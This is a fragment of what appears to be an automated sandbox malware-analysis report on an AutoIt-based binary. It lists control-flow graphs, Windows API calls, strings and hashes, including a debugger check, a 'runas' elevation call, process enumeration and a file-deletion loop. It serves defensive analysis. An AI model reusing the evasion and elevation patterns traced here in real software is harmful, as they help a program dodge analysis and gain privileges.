105047->105062 105063 c00aae messages 105047->105063 105064 c10568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 105047->105064 105065 c46115 105047->105065 105067 c10413 29 API calls pre_c_initialization 105047->105067 105049->105047 105050->105048 105058 bfbed9 8 API calls 105050->105058 105051->105047 105072 c63fe1 81 API calls __wsopen_s 105053->105072 105054->105047 105055->105048 105061 bfbed9 8 API calls 105055->105061 105058->105048 105059->105047 105060->105047 105061->105048 105062->105047 105071 c63fe1 81 API calls __wsopen_s 105063->105071 105064->105047 105070 c63fe1 81 API calls __wsopen_s 105065->105070 105067->105047 105068->105037 105069->105048 105070->105063 105071->105048 105072->105048 105073->105048

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 237 bf5fc8-bf6037 call bfbf73 GetVersionExW call bf8577 242 bf603d 237->242 243 c3507d-c35090 237->243 245 bf603f-bf6041 242->245 244 c35091-c35095 243->244 246 c35097 244->246 247 c35098-c350a4 244->247 248 bf6047-bf60a6 call bfadf4 call bf55dc 245->248 249 c350bc 245->249 246->247 247->244 250 c350a6-c350a8 247->250 262 bf60ac-bf60ae 248->262 263 c35224-c3522b 248->263 253 c350c3-c350cf 249->253 250->245 252 c350ae-c350b5 250->252 252->243 255 c350b7 252->255 256 bf611c-bf6136 GetCurrentProcess IsWow64Process 253->256 255->249 258 bf6138 256->258 259 bf6195-bf619b 256->259 261 bf613e-bf614a 258->261 259->261 268 c35269-c3526d GetSystemInfo 261->268 269 bf6150-bf615f LoadLibraryA 261->269 264 c35125-c35138 262->264 265 bf60b4-bf60b7 262->265 266 c3524b-c3524e 263->266 267 c3522d 263->267 271 c35161-c35163 264->271 272 c3513a-c35143 264->272 265->256 273 bf60b9-bf60f5 265->273 274 c35250-c3525f 266->274 275 c35239-c35241 266->275 270 c35233 267->270 276 bf619d-bf61a7 GetSystemInfo 269->276 277 bf6161-bf616f GetProcAddress 269->277 270->275 282 c35165-c3517a 271->282 283 c35198-c3519b 271->283 279 c35150-c3515c 272->279 280 c35145-c3514b 272->280 273->256 281 bf60f7-bf60fa 273->281 274->270 284 c35261-c35267 274->284 275->266 278 bf6177-bf6179 276->278 277->276 285 bf6171-bf6175 GetNativeSystemInfo 277->285 292 bf617b-bf617c FreeLibrary 278->292 293 bf6182-bf6194 278->293 279->256 280->256 286 c350d4-c350e4 281->286 287 bf6100-bf610a 281->287 288 c35187-c35193 282->288 289 c3517c-c35182 282->289 290 c351d6-c351d9 283->290 291 c3519d-c351b8 283->291 284->275 285->278 297 c350f7-c35101 286->297 298 c350e6-c350f2 286->298 287->253 294 bf6110-bf6116 287->294 288->256 289->256 290->256 299 c351df-c35206 290->299 295 c351c5-c351d1 291->295 296 c351ba-c351c0 291->296 292->293 294->256 295->256 296->256 300 c35103-c3510f 297->300 301 c35114-c35120 297->301 298->256 302 c35213-c3521f 299->302 303 c35208-c3520e 299->303 300->256 301->256 302->256 303->256
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00BF5FF7
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00C8DC2C,00000000,?,?), ref: 00BF6123
                                                                                                                                                                                                                                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 00BF612A
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00BF6155
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BF6167
                                                                                                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00BF6175
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 00BF617C
                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 00BF61A1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                            • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                            • Opcode ID: 26fa03554ff4d6000abefbdf63acebf7149ac5025828a00909252971c25bc2ac
                                                                                                                                                                                                                                                                            • Instruction ID: 10bc44d11398d2fbb1306b2b2fe4edf3170af995388732471a180739d48aa714
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26fa03554ff4d6000abefbdf63acebf7149ac5025828a00909252971c25bc2ac
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5A1A13591A2C4CFC716CB68FC85BAD3FAC6B26300F1C59D9D981A7272C66D4648CB35

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00BF3368,?), ref: 00BF33BB
                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00BF3368,?), ref: 00BF33CE
                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00CC2418,00CC2400,?,?,?,?,?,?,00BF3368,?), ref: 00BF343A
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00BF3462,00CC2418,?,?,?,?,?,?,?,00BF3368,?), ref: 00BF42A0
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001,00CC2418,?,?,?,?,?,?,?,00BF3368,?), ref: 00BF34BB
                                                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00C33CB0
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00CC2418,?,?,?,?,?,?,?,00BF3368,?), ref: 00C33CF1
                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CB31F4,00CC2418,?,?,?,?,?,?,?,00BF3368), ref: 00C33D7A
                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00C33D81
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF34D3: GetSysColorBrush.USER32(0000000F), ref: 00BF34DE
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF34D3: LoadCursorW.USER32(00000000,00007F00), ref: 00BF34ED
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF34D3: LoadIconW.USER32(00000063), ref: 00BF3503
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF34D3: LoadIconW.USER32(000000A4), ref: 00BF3515
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF34D3: LoadIconW.USER32(000000A2), ref: 00BF3527
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BF353F
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF34D3: RegisterClassExW.USER32(?), ref: 00BF3590
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BF35E1
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BF3602
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00BF3368,?), ref: 00BF3616
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00BF3368,?), ref: 00BF361F
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BF3A3C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • AutoIt, xrefs: 00C33CA5
                                                                                                                                                                                                                                                                            • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00C33CAA
                                                                                                                                                                                                                                                                            • runas, xrefs: 00C33D75
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                            • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                            • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                                                            • Opcode ID: beae285514dc5a288701da4c69703a63b3c12bde8550146e4d77754f1f86d7c9
                                                                                                                                                                                                                                                                            • Instruction ID: d24d91fccccc6f9cc803fd50ae94d0d9cf87d7da54e4e2f6d1bb52f9f8ef1da8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: beae285514dc5a288701da4c69703a63b3c12bde8550146e4d77754f1f86d7c9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A351F8701083886BDB05EF60EC45FBE7BF89F94740F04056CF692531A2DB648A4ED762

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 1026 c5dc54-c5dc9b call bfbf73 * 3 call bf5851 call c5eab0 1037 c5dc9d-c5dca6 call bf6b7c 1026->1037 1038 c5dcab-c5dcdc call bf568e FindFirstFileW 1026->1038 1037->1038 1042 c5dcde-c5dce0 1038->1042 1043 c5dd4b-c5dd52 FindClose 1038->1043 1042->1043 1045 c5dce2-c5dce7 1042->1045 1044 c5dd56-c5dd78 call bfbd98 * 3 1043->1044 1047 c5dd26-c5dd38 FindNextFileW 1045->1047 1048 c5dce9-c5dd24 call bfbed9 call bf7bb5 call bf6b7c DeleteFileW 1045->1048 1047->1042 1051 c5dd3a-c5dd40 1047->1051 1048->1047 1061 c5dd42-c5dd49 FindClose 1048->1061 1051->1042 1061->1044
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF55D1,?,?,00C34B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BF5871
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5EAB0: GetFileAttributesW.KERNEL32(?,00C5D840), ref: 00C5EAB1
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C5DCCB
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C5DD1B
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C5DD2C
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C5DD43
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C5DD4C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                            • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                            • Opcode ID: b096225445b1ebd99233fb431044ae20a04c64604eeccfe276854011ed876112
                                                                                                                                                                                                                                                                            • Instruction ID: 54698da04a184794b50e43a72af1f0c72ccaeaea35b4bc256ceb860fba61b481
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b096225445b1ebd99233fb431044ae20a04c64604eeccfe276854011ed876112
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31317E35008349ABC310EF20C8859AFB7E8AE95301F404D9DF9E683191EB21DE0DCB67
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00C5DDAC
                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00C5DDBA
                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00C5DDDA
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C5DE87
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                                                                                                                            • Opcode ID: 98513431e113f526c508f35c7cb9903bed182b97c4de6bbe147f4976141896c2
                                                                                                                                                                                                                                                                            • Instruction ID: b105500e76693d452cae8ce44df75fb684f8be5311eccc52916d21ef4c27c50e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98513431e113f526c508f35c7cb9903bed182b97c4de6bbe147f4976141896c2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB317E710083049FD310EF50D885FAEBBE8AF99350F04096DFA82871A1DB719A89CB96
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetInputState.USER32 ref: 00BFEF07
                                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 00BFF107
                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BFF228
                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00BFF27B
                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00BFF289
                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BFF29F
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00BFF2B1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2189390790-0
                                                                                                                                                                                                                                                                            • Opcode ID: e58507d9ce22f1d7185f6d4b2c06572989cf8f5b93b61115a6b702ba51e86e12
                                                                                                                                                                                                                                                                            • Instruction ID: 3ad1199200eb44a253a5b01d6786ed721c022041c03b7ef6c230e0bcf28ec646
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e58507d9ce22f1d7185f6d4b2c06572989cf8f5b93b61115a6b702ba51e86e12
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE32E370604246EFD728CF24C884FBAB7E5FF81304F24456DE665872A1DB71E988CB86

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00BF3657
                                                                                                                                                                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 00BF3681
                                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF3692
                                                                                                                                                                                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00BF36AF
                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF36BF
                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A9), ref: 00BF36D5
                                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF36E4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                            • Opcode ID: b597888b35b2e63cb806ef268b94ff1a0882a60f9473701b0472f7e32c460fe3
                                                                                                                                                                                                                                                                            • Instruction ID: 35b3a664e4ca84c29e3d470067665aa3175b0328b1fc642bc3d59c52fcb93747
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b597888b35b2e63cb806ef268b94ff1a0882a60f9473701b0472f7e32c460fe3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6721D3B1D01358AFDB00EFA4EC89BDDBBB4FB08714F10411AF612A62A0D7B54544DF99

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 369 c309db-c30a0b call c307af 372 c30a26-c30a32 call c25594 369->372 373 c30a0d-c30a18 call c1f636 369->373 378 c30a34-c30a49 call c1f636 call c1f649 372->378 379 c30a4b-c30a94 call c3071a 372->379 380 c30a1a-c30a21 call c1f649 373->380 378->380 389 c30b01-c30b0a GetFileType 379->389 390 c30a96-c30a9f 379->390 387 c30cfd-c30d03 380->387 391 c30b53-c30b56 389->391 392 c30b0c-c30b3d GetLastError call c1f613 CloseHandle 389->392 394 c30aa1-c30aa5 390->394 395 c30ad6-c30afc GetLastError call c1f613 390->395 398 c30b58-c30b5d 391->398 399 c30b5f-c30b65 391->399 392->380 408 c30b43-c30b4e call c1f649 392->408 394->395 400 c30aa7-c30ad4 call c3071a 394->400 395->380 403 c30b69-c30bb7 call c254dd 398->403 399->403 404 c30b67 399->404 400->389 400->395 411 c30bc7-c30beb call c304cd 403->411 412 c30bb9-c30bc5 call c3092b 403->412 404->403 408->380 419 c30bfe-c30c41 411->419 420 c30bed 411->420 412->411 418 c30bef-c30bf9 call c28a2e 412->418 418->387 422 c30c43-c30c47 419->422 423 c30c62-c30c70 419->423 420->418 422->423 427 c30c49-c30c5d 422->427 424 c30c76-c30c7a 423->424 425 c30cfb 423->425 424->425 428 c30c7c-c30caf CloseHandle call c3071a 424->428 425->387 427->423 431 c30ce3-c30cf7 428->431 432 c30cb1-c30cdd GetLastError call c1f613 call c256a6 428->432 431->425 432->431
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C3071A: CreateFileW.KERNEL32(00000000,00000000,?,00C30A84,?,?,00000000,?,00C30A84,00000000,0000000C), ref: 00C30737
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C30AEF
                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C30AF6
                                                                                                                                                                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00C30B02
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C30B0C
                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C30B15
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C30B35
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C30C7F
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C30CB1
                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C30CB8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                            • String ID: H
                                                                                                                                                                                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                            • Opcode ID: 44b4759d29cfa755d4e2cb28cb41e885ed27f774932b5c5f0208a180992689ec
                                                                                                                                                                                                                                                                            • Instruction ID: 38ad8b975fa14cdcdc2bb65866d469696cd02642eff0c4039bcca14c70384eae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44b4759d29cfa755d4e2cb28cb41e885ed27f774932b5c5f0208a180992689ec
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7AA108329141089FDF19EF68E861BAD7BA0AF06324F24015DF811DB3D2D7319D12DB51

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00C34B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00BF55B2
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BF525A
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BF53C4
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C34BFD
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C34C3E
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C34C80
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C34CE7
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C34CF6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
